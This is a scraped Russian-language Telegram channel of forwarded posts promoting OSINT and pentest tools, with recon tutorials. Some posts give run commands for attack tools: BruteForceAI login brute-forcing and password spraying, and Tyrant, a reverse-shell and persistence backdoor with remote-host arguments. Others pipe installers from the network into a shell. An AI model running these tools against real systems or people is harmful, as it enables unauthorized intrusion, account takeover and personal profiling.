Заметки OSINTера
6.59K subscribers
2.15K photos
201 videos
299 files
3.36K links
Download Telegram
Forwarded from C.I.T. Security
Узнаём ВСЁ о человеке через email и логины в соцсетях — нашли детектива для разведки по открытым источникам.

Вбиваете почту или логин и получаете полную сводку:

• Проверяет, где засветился email и когда был зарегистрирован
• Ищет логины в соцсетях, Twitter, GitHub, Reddit и других платформах
Массово сканирует открытые файлы и базы.
• Имитирует поведение человека, так что антифрод-системы даже не поймут, что их сканируют.
БЕЗ регистраций, лимитов и платных подписок.

Б Е С П Л А Т Н О

Интернет помнит всё — user-scanner.


#OSINT

🛜 Крутой VPN | Смс 💣 бомбер | Telegram Stars со скидкой 🌟
Please open Telegram to view this post
VIEW IN TELEGRAM
👀1
Forwarded from S.E.Book
Очередная true story со скамом через тестовые задания на собеседованиях... Если ищите работу за пределами своей страны, то будьте осторожны.

Источник.

#Фишинг #SE
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from [PYTHON:TODAY]
⚡️ 2 622 API для парсинга почти всего интернета — готовая база для сбора данных

Тебе не нужно писать парсеры с нуля, бороться с версткой сайтов и поддерживать инфраструктуру.

Чувак уже собрал 2622 готовых API из 17 категорий — бери и подключай к своему проекту.

Что внутри?
💬 Социальные сети
💬 Маркетплейсы и интернет-магазины
💬 Сайты и веб-приложения
💬 SEO-данные
💬 Видео-платформы
💬 Игры
💬 Базы данных
💬 Порталы вакансий
💬 Недвижимость
💬 И многое другое

Это фактически “золотая жила” для разработчиков, аналитиков и стартапов.

🚀 Что можно делать

🔍 Сбор данных — вытаскивать информацию с сайтов, соцсетей, e-commerce платформ.
🤖 Автоматизация — убирать ручную рутину и строить автопроцессы.
📊 Аналитика — мониторить конкурентов, цены, тренды, рынок.
🎯 Лидогенерация — находить контакты и возможности.
🛒 E-commerce мониторинг — отслеживать товары и динамику цен.
📱 Анализ соцсетей — посты, вовлеченность, тренды.
💼 Рынок труда — агрегировать вакансии и зарплаты.
🏠 Недвижимость — собирать объявления и рыночные показатели.
🤖 Интеграция с ИИ — передавать данные в модели, генерировать инсайты.

Иногда самый мощный инструмент — это не код, который ты написал, а код, который уже кто-то сделал за тебя.

🔗 Сохраняем и пробуем ТУТ

#cheatsheet
Please open Telegram to view this post
VIEW IN TELEGRAM
🖥 Репозиторий: Parrot Security OS — одна система для всех задач

Parrot Security OS — дистрибутив Linux, основанный на Debian с упором на компьютерную безопасность.

— Предназначен для тестирования системы на проникновение, оценки уязвимостей и ликвидации их последствий, компьютерной криминалистики и анонимного просмотра веб-страниц. 

1. Дистрибутив оптимизирован для работы на устройствах с низкой производительностью, имеет минимальные системные требования.
2. Более 600 предустановленных инструментов — полный набор утилит для работы с криптографией, сетями, веб-приложениями и цифровыми расследованиями.
3. Подходит как для начинающих, так и для профессионалов, есть возможность кастомизации под задачи: от добавления новых инструментов до настройки сетей.

Официальный сайт (https://www.parrotsec.org/)
Parrot Security OS: ультимативный выбор для пентестинга и цифровой криминалистики (https://www.securitylab.ru/blog/personal/xiaomite-journal/353700.php?ysclid=mm058x47cm446595416)

#OS #Linux #Debian

@hackernews_lib
🔎 IntelTrace — инструментарий автоматизации OSINT, ориентированный на Linux, с панелью мониторинга Flask в хакерском стиле . Он собирает общедоступную информацию об IP-адресах, электронных письмах, номерах телефонов и именах пользователей, сопоставляет результаты, сохраняет их в MongoDB и генерирует отчеты в формате PDF/JSON.

📎 https://github.com/Gowtham-Darkseid/IntelTrace

📱 Telegram | 🌐 ВК | 📲 MAX
Please open Telegram to view this post
VIEW IN TELEGRAM
Инструменты для поиска информации о кредитных картах (OSINT):

📎 https://www.bincodes.com/
📎 https://bincheck.io/
📎 https://www.fraudlabspro.com/credit-card-bin-or-iin-lookup
📎 https://github.com/kahunalu/pwnbin
📎 https://binlist.net/
📎 https://dnschecker.org/credit-card-validator.php

📱 Telegram | 🌐 ВК | 📲 MAX
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Osint Losena
Telegram

🔹 ChatBottle: Telegram (A directory of Telegram bots for various purposes.) — https://chatbottle.co/bots/telegram

🔹 ChatToday (An online chat platform for connecting and chatting with people from around the world.) — https://chattoday.com/

🔹 informer (A Python library for retrieving information about Telegram channels, groups, and users.) — https://github.com/paulpierre/informer

🔹 _IntelligenceX: Telegram (IntelligenceX's Telegram tool for searching and analyzing Telegram data.) — https://intelx.io/tools?tab=telegram

🔹 Lyzem.com (A website to search and find Telegram groups and channels.) — https://lyzem.com/

🔹 Telegram Channels (A directory of Telegram channels covering various topics.) — https://telegramchannels.me/

🔹 Telegram Channels (A platform to discover and browse Telegram channels.) — https://tlgrm.eu/channels

🔹 Telegram Channels Search (A search engine to find Telegram channels by keywords.) — https://xtea.io/ts_en.html

🔹 Telegram Directory (A comprehensive directory of Telegram channels, groups, and bots.) — https://tdirectory.me/

🔹 Telegram Group (A website to search and join Telegram groups.) — https://www.telegram-group.com/

🔹 telegram-history-dump (A Python script to dump the history of a Telegram chat into a SQLite database.) — https://github.com/tvdstaaij/telegram-history-dump

🔹 Telegram-osint-lib (A Python library for performing open-source intelligence (OSINT) on Telegram.) — https://github.com/Postuf/telegram-osint-lib

🔹 Telegram Scraper (A powerful Telegram scraping tool for extracting user information and media.) — https://github.com/th3unkn0n/TeleGram-Scraper

🔹 Tgram.io (A platform to explore and search for Telegram channels, groups, and bots.) — https://tgram.io/

🔹 Tgstat.com (A comprehensive platform for analyzing and tracking Telegram channels and groups.) — https://tgstat.com/

🔹 Tgstat RU (A Russian platform for analyzing and monitoring Telegram channels and groups.) — https://tgstat.ru/
🐳1👀1
Forwarded from S.E.Book
Вы ведь знаете, что сервис arXiv.org содержит в себе тонну научных статей на всевозможные темы? Там можно найти очень много полезной информации по различным направлениям, включая ИБ.

Однако система фильтров не совсем продумана и не очень удобна. Поэтому энтузиасты запилили отдельный сервис, где можно найти любую статью с уклоном в ИБ. Сервис называется CyberSec Research (название говорит само за себя) и он позволяет быстро находить материал с arXiv.org по нужной теме. Переходим, выбираем нужный фильтр, читаем и обучаемся:

➡️ https://research.pwnedby.me/

#Разное
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Open Source (Черный Треугольник)
tookie-osint

Tookie — это продвинутый инструмент OSINT (разведки с использованием открытых источников), предназначенный для поиска учетных записей в социальных сетях на основе введенных данных.

Он поддерживает множество платформ, что позволяет проводить всесторонний анализ присутствия пользователя в сети.

Инструмент разработан с учетом удобства использования и может быть полезен как для специалистов по безопасности, так и для исследователей.

Lang: Python
https://github.com/Alfredredbird/tookie-osint
Forwarded from Codeby
BruteForceAI - метод перебора с помощью нейросети🧠

BruteForceAI — это инструмент для тестирования на проникновение, который преобразует традиционные атаки методом перебора, интегрируя LLM для интеллектуального анализа форм. Инструмент автоматически идентифицирует селекторы форм входа в систему с помощью ИИ, а затем выполняет сложные многопоточные атаки с использованием моделей поведения, сходных с человеческими.


📐Основные особенности
📉Многопоточное выполнение с синхронизированными задержками
📉Режимы атаки «Брутфорс» и «Распыление паролей»
📉Имитация человеческого чувства времени с учетом дрожания и случайности
📉User-Agent для лучшего обхода защиты
📉Комплексное ведение журналов с использованием базы данных SQLite.

⬇️Установка:
0️⃣Клонирование репозитория:
git clone https://github.com/MorDavid/BruteForceAI

cd BruteForceAI/


1️⃣Установка зависимостей:
pip install -r requirements.txt


2️⃣Установка LLM модели:
curl -fsSL https://ollama.ai/install.sh | sh

ollama pull llama3.2:3b

Это всё бесплатно, не требует регистрации или API ключей

3️⃣Создаём список urls адресов:
vim urls.txt

➡️https://authenticationtest.com/simpleFormAuth/

⛓️‍💥Запуск:
➡️Анализ форм авторизации:
python BruteForceAI.py analyze --urls urls.txt --llm-provider ollama

➡️Исполнение атаки:
python BruteForceAI.py attack --urls urls.txt --username users.txt --passwords passwords.txt --threads 10


#pentest #bugbounty #bruteforce #AI

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Codeby
🎇 SysReptor

Полностью настраиваемая платформа для составления отчетов о тестировании на проникновение, предназначенная для специалистов в области кибербезопасности.


❗️Решает одну из ключевых проблем, (которую так не любят делать технические специалисты) — стандартизацию и автоматизацию отчётности.

🧿Основные возможности
⏺️поддержка Markdown;
⏺️полная кастомизация через HTML и CSS;
⏺️поддержка экспорта в PDF;
⏺️развертывание на собственном сервере или в облаке.

⬇️Установка
Устанавливаем дополнительные компоненты, Docker и скачиваем установочный скрипт инструмента:
sudo apt update
sudo apt install -y sed curl openssl uuid-runtime coreutils
curl -fsSL https://get.docker.com | sudo bash
bash <(curl -s https://docs.sysreptor.com/install.sh)

Веб-приложение будет доступно по адресу http://127.0.0.1:8000/

🔑Разработка отчетов
Конструктор отчетов позволяет полностью настроить внешний вид и структуру итоговых отчетов в формате PDF. Ограничений по дизайну нет, поэтому вы можете адаптировать отчеты под свои нужды.

Существует два основных подхода к созданию отчетов:
1️⃣ Начать с существующего шаблона (скопировать существующий шаблон отчета из раздела и изменить его в соответствии со своими требованиями).
2️⃣ Начать создавать отчет нуля:
➡️определить поля отчета и поля находок (уязвимостей);
➡️определить базовую структуру отчета в редакторе макетов;
➡️настроить HTML и CSS в соответствии со своими потребностями с помощью редакторов кода.

Существует возможность использовать также и готовые фрагменты HTML и CSS, которые упрощают процесс создания отчетов. Они содержат часто используемые элементы отчетов (титульный лист, верхний и нижний колонтитулы, оглавление, список выводов, приложения и т. д.), которые можно легко настроить в соответствии с конкретными потребностями.

🔁Шаблоны уязвимостей
Одна из самых полезных функций для ИБ-специалистов, которая позволяет ускорить дальнейшую подготовку отчетов. Они содержат общие описания результатов и уязвимостей. Таким образом, описав результаты один раз в шаблоне, далее можно использовать их в различных отчетах.

#tools #reports #pentesting

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Osint Losena
** Credentials, leaks & cybercrime intelligence

🔹 Have I Been Pwned (Australia)
▪️ Website: https://haveibeenpwned.com/
▪️ Founded: 2013 г.
▪️ Founder(s): Troy Hunt

🔹 IntelligenceX (Czech Republic)
▪️ Website: https://intelx.io/
▪️ Founded: 2018 г.
▪️ Founder(s): Peter Kleissne

🔹 Leakix (Belgium)
▪️ Website: https://leakix.net/
▪️ Founded: 2021 г.
▪️ Founder(s): Danny Willems, Gregory Boddin

🔹 LeakRadar (France)
▪️ Website: https://leakradar.io/
▪️ Founded: Unknown г.
▪️ Founder(s): Alexandre Vandamme

🔹 Hudson Rock (Israel)
▪️ Website: https://hudsonrock.com/
▪️ Founded: 2020 г.
▪️ Founder(s): Roi Carthy



** Internet exposure & infrastructure intelligence

🔹 Shodan (United States)
▪️ Website: https://www.shodan.io/
▪️ Founded: 2009 г.
▪️ Founder(s): John Matherly

🔹 Censys (United States)
▪️ Website: https://www.censys.com/
▪️ Founded: 2017 г.
▪️ Founder(s): Zakir Durumeric

🔹 Onyphe (France)
▪️ Website: https://www.onyphe.io/
▪️ Founded: 2017 г.
▪️ Founder(s): Patrice Auffret

🔹 Netlas (Armenia)
▪️ Website: https://netlas.io/
▪️ Founded: 2020 г.
▪️ Founder(s): Arthur Kotylevskiy

🔹 ZoomEye (China)
▪️ Website: https://www.zoomeye.ai/
▪️ Founded: 2013 г.
▪️ Founder(s): Not publicly listed

🔹 FOFA (China)
▪️ Website: https://en.fofa.info/
▪️ Founded: 2021 г.
▪️ Founder(s): Not publicly listed

🔹 CriminalIP (South Korea)
▪️ Website: https://www.criminalip.io/
▪️ Founded: 2023 г.
▪️ Founder(s): Byungtak Kang

🔹 VirusTotal (Spain (Google))
▪️ Website: https://www.virustotal.com/
▪️ Founded: 2004 г.
▪️ Founder(s): Bernardo Quintero

🔹 GreyNoise (United States)
▪️ Website: https://greynoise.io/
▪️ Founded: 2017 г.
▪️ Founder(s): Andrew Morris

🔹 PulseDive (United States)
▪️ Website: https://pulsedive.com/
▪️ Founded: 2017 г.
▪️ Founder(s): Dan Scary

🔹 urlscan.io (Germany)
▪️ Website: https://urlscan.io/
▪️ Founded: 2020 г.
▪️ Founder(s): Johannes Gilger

🔹 Hunter.how (Unknown)
▪️ Website: https://hunter.how/
▪️ Founded: Unknown г.
▪️ Founder(s): Not disclosed
🔥1
🖥 Репозиторий: Sickle — Инструментарий для разработки и анализа полезных нагрузок

Sickle — это Payload Development Kit (PDK) для упрощения процесса создания, тестирования и форматирования шеллкодов.

— Позволяет быстро преобразовывать «сырой» байт-код в различные форматы (C, Python, Perl, Bash и др.), а также включает функции для поиска «плохих» символов и симуляции выполнения кода.

Ссылка на GitHub (https://github.com/wetw0rk/sickle-pdk)

#Exploit #ShellCode #Payload #RedTeam | Лаборатория хакера (https://max.ru/lab_hack)

@hackernews_lib
🔎 EUOSINT — комплекс инструментов OSINT для расширенного глобального мониторинга разведывательной информации, анализа ситуации и выявления рисков.

🔎 https://github.com/scalytics/EUOSINT
🔎 https://osint.scalytics.io/

📱 Telegram | 🌐 ВК | 📲 MAX
Please open Telegram to view this post
VIEW IN TELEGRAM
🔎 Пассивная разведка сайта: как собрать инфу, не трогая цель разбираем тему, как и как и обещали в чате

Большинство думает, что пентест начинается со сканеров.
На деле — всё начинается с пассивной разведки.

👉 Пассивная разведка — это сбор информации БЕЗ взаимодействия с целью
(ты не отправляешь запросы на сервер)

Почему это важно?
— тебя не видно в логах
— можно найти уязвимости ещё до атаки
— формируется картина цели

📦 Что можно узнать:

• домены и поддомены
• IP-адреса
• используемые технологии
• открытые данные (утечки, репозитории)
• почты сотрудников

🛠 Инструменты:

— Amass
— theHarvester
— Shodan
— Censys

💡 Пример:

Ты находишь поддомен вида:
dev.example.com


А там — тестовая среда без защиты. Уже можно черпать очень много информации.

Также, хотел бы вам посоветовать отличный репозиторий, содержащий перечень инструментов и ресурсов для сбора информации из открытых источников (OSINT).

🪧Информация о компании, которая может быть полезной:

Услуги — чем занимается компания?
Местоположение — где расположена компания?
Размер — какого размера компания?
Структура — какова структура компании и как взаимодействуют различные отделы?
Известность — насколько хорошо известна компания в мире?
Целевая аудитория — кому компания предоставляет свои услуги?
Маркетинг — как компания рекламирует свои услуги?
Активы — все ресурсы компании (офисы, веб-сайты, сетевая инфраструктура и т. д.).
Безопасность — какие меры безопасности предусмотрены для защиты активов компании?
Партнёры — с кем сотрудничает компания?
Вакансии — открыты ли вакансии в компании?

Полезная информация о сотруднике:

Должность — какие роли и обязанности выполняет сотрудник?
Зависимости — какие функциональные или рабочие зависимости существуют у сотрудника?
Контактные данные — номер телефона, адрес электронной почты, место проживания, псевдонимы и т.д.
Операционная система — какую операционную систему использует сотрудник для работы?
Активы — есть ли у сотрудника веб-сайт, блог, аккаунты в социальных сетях или какие-либо специфические приложения?
Интересы — какие у сотрудника личные увлечения, хобби или области интересов вне рабочих обязанностей?
Связи — с кем связан сотрудник?

🎯 Итог:

Пассивная разведка — это не просто этап «перед началом»,
это фундамент всей дальнейшей атаки.

Чем лучше ты собрал информацию на старте —
тем меньше тебе придётся «шуметь» дальше.

👉 Здесь решает не количество инструментов,
а умение связывать факты:

один поддомен → один email → один сотрудник → одна точка входа


💡 кто хорошо делает OSINT —
тот уже на шаг впереди ещё до первого запроса к цели.

#osint #recon #пассивнаяраздведка
🔎 Мини-алгоритм пассивной разведки (OSINT)

Чтобы не тонуть в инструментах — я постарался обобщить все в мини-роудмап:

1️⃣ Определи цель
— домен / компания / ник
— зафиксируй все варианты (зеркала, поддомены, похожие названия)

2️⃣ Собери поверхность атаки
— домены и поддомены
— IP и хосты
— связанные сервисы

(через Amass, Censys)

3️⃣ Определи технологии
— CMS / фреймворки
— версии сервисов
— сторонние интеграции

4️⃣ Ищи открытые источники
— репозитории
— утечки
— документы
— кэш поисковиков

(через theHarvester, Shodan)

5️⃣ Собери людей и доступы
— сотрудники
— почты
— роли
— соцсети

6️⃣ Найди слабые точки
— dev / test / staging
— старые версии сайтов
— забытые сервисы
— лишняя информация в открытом доступе

7️⃣ Сделай pivot
— email → аккаунты
— домен → поддомены
— человек → компания → инфраструктура

🎯 Итог:

Пассивка — это не просто сбор данных,
а последовательная сборка пазла.


#osint #recon #пассивнаяраздведка
Программируемая поисковая система Google PSE, ранее известная как Custom Search Engine (CSE), — это малоиспользуемый, но мощный инструмент для OSINT-расследований.

📎 https://programmablesearchengine.google.com/

PSE (Personal Service Except — поисковая оптимизация) — это ваша собственная, тщательно отобранная версия Google. Вместо поиска по всему интернету, она ищет только на конкретных сайтах, доменах или страницах, которые вы выберете. Google занимается индексированием в фоновом режиме, а вы определяете область поиска.

Подборки Google PSE для OSINT:
📎 https://github.com/paulpogoda/OSINT-CSE
📎 https://github.com/The-Osint-Toolbox/Custom-Search-Engines
📎 https://www.freesourcingtools.com/google-cse
📎 https://booleanstrings.com/all-the-40-forty-custom-search-engines/

📱 Telegram | 🌐 ВК | 📲 MAX
Please open Telegram to view this post
VIEW IN TELEGRAM
⚔️ Активная разведка сайта: когда ты начинаешь “стучаться” в цель

Если пассивка — это наблюдение,
то активная разведка — это уже действие.


👉 Активная разведка — это взаимодействие с целью
(ты отправляешь запросы → система может тебя заметить)

Почему это важно?

— получаешь реальные ответы от сервера
— находишь уязвимости, которые не видны в OSINT
— проверяешь гипотезы, собранные на пассивке

⚠️ Но есть нюанс:

— ты оставляешь следы в логах
— можешь триггернуть WAF / IDS
— без разрешения это может быть незаконно


📦 Что сюда входит:

• сканирование портов
• перебор директорий и файлов
• fuzzing параметров
• анализ ответов сервера
• поиск точек входа

🛠 Инструменты:

Nmap
— Gobuster
ffuf
Burp Suite

💡 Пример:

Ты находишь поддомен через пассивку →
test.example.com


Дальше:

— сканируешь порты
— находишь admin-панель
— проверяешь параметры

И вот тут уже начинаются реальные уязвимости

🎯 Важно:

Активка без пассивки = стрельба в темноту
Активка после пассивки = точечный удар

#osint #активнаяраздведка
🔎 Мини-алгоритм активной разведки (OSINT)

1️⃣ Берёшь данные с пассивки
— домены, поддомены
— IP и сервисы
— найденные dev/test точки

2️⃣ Проверяешь доступность
— какие хосты отвечают
— какие порты открыты
— какие сервисы реально доступны

👉 Отсекаешь всё лишнее

3️⃣ Определяешь сервисы
— сайт, API, админка?
— какие технологии используются
— есть ли WAF / защита

👉 Понимаешь, с чем имеешь дело

4️⃣ Ищешь скрытые директории
— /admin
— /login
— /api
— /backup
— /dev

👉 Очень часто здесь лежит самое интересное

5️⃣ Анализируешь ответы сервера
— коды ответов (200/403/404)
— размер ответа
— заголовки
— поведение при разных запросах

👉 Ищешь аномалии

6️⃣ Проверяешь точки ввода
— формы
— параметры
— API
— загрузки файлов

👉 Смотришь, как система обрабатывает данные

7️⃣ Тестируешь поведение
— нестандартные значения
— разные методы
— изменение запросов

👉 Ловишь ошибки логики

8️⃣ Выделяешь точки входа
— админки
— авторизация
— API
— старые сервисы

👉 Формируешь векторы атаки


🎯 Вывод:

Активная разведка
— это не “запустить сканер и ждать”.

Это последовательная работа с гипотезами,
где каждый шаг сужает область поиска.


#osint #активнаяраздведка
Forwarded from Codeby
Tyrant

Tyrant — это вредоносный инструмент, используемый для тестирования на проникновение и обеспечения постоянного присутствия под удаленным управлением, обладающий обширными возможностями.


📐Основные характеристики:
📉Reverse shell: позволяет злоумышленнику инициировать сеанс командной оболочки с указанным UID пользователя, получая соответствующие привилегии.
📉Внедрение и сохранение бэкдора: внедряет бэкдор в целевую систему и обеспечивает сохранение контроля даже после перезагрузки системы.
📉Загрузка веб-оболочки Tyrant: загружает и запускает обратную оболочку Tyrant через веб-доступ.
📉Шифрование и поддельные протоколы: использует поддельные токены JWT и зашифрованную связь для обхода обнаружения системы безопасности.
🖱Восстановление по SSH: позволяет злоумышленнику повторно подключиться и восстановить бэкдор через SSH.

⬇️Установка:
0️⃣Клонирование репозитория и переход в рабочую директорию:
git clone https://github.com/MartinxMax/Tyrant.git

cd Tyrant/


1️⃣Установка зависимостей:
sudo apt-get install zlib1g-dev libzstd-dev libssl-dev


2️⃣Компиляция бинарного файла:
gcc -static -o tyrant tyrant.c ./lib/core.c ./lib/random_md5.c -lssl -lcrypto -lz -lzstd


⛓️‍💥Запуск:
./tyrant -uid [UID] -rhost [RHOST] -rport [RPORT]


#web

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM